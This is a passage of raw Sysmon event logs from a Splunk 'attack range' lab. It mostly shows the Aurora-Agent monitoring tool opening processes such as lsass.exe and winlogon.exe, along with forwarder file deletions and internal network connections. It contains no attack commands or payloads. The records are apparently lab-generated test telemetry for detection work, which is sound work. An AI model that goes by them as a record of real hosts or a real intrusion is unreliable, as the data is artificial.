Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016178Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.774{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016177Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.771{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016176Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.770{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016175Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.768{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016174Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.763{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016173Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.761{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016172Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.757{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016171Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.756{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016170Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.747{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016169Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.744{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016168Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.740{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016167Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.725{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016166Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.721{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016165Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.704{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016164Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.698{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016163Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.675{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016162Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.660{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016161Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.652{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016160Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.645{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016159Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.637{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016158Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.599{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016157Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.586{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016156Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.578{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016155Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.570{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016154Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.562{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016153Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.555{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016152Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.547{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016151Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.544{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 23542300x800000000000000016150Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.301{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F170AE7050DA237C97E15A8BA1ADB251,SHA256=8D0F851CAA7DA18664DEA9F2AEBDCF27E6CC431BFF17121446DA3317C6981AAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016183Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:43.627{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B36C1644A37EC0BA14FD8267187758C7,SHA256=D1117E2717B235B2141F3303BEC2202C8114E5D35531F81B3A4F94C3539EECFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041437Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:43.040{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FFC943C3DEF6B421A7FA6A54FD9B1F4,SHA256=603E0E3F4FFA45281A273C1B5EB2043E8F5FD399131256DDF10DBF54A98696B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000016182Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:40.922{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50080-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000016184Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:44.684{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80A4CEE993FAB08177270BB689FDD661,SHA256=F65C8EB86A689B8318A3B43E233735E4689EF825B09E4DD1F4D81E362D7808E8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000041440Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 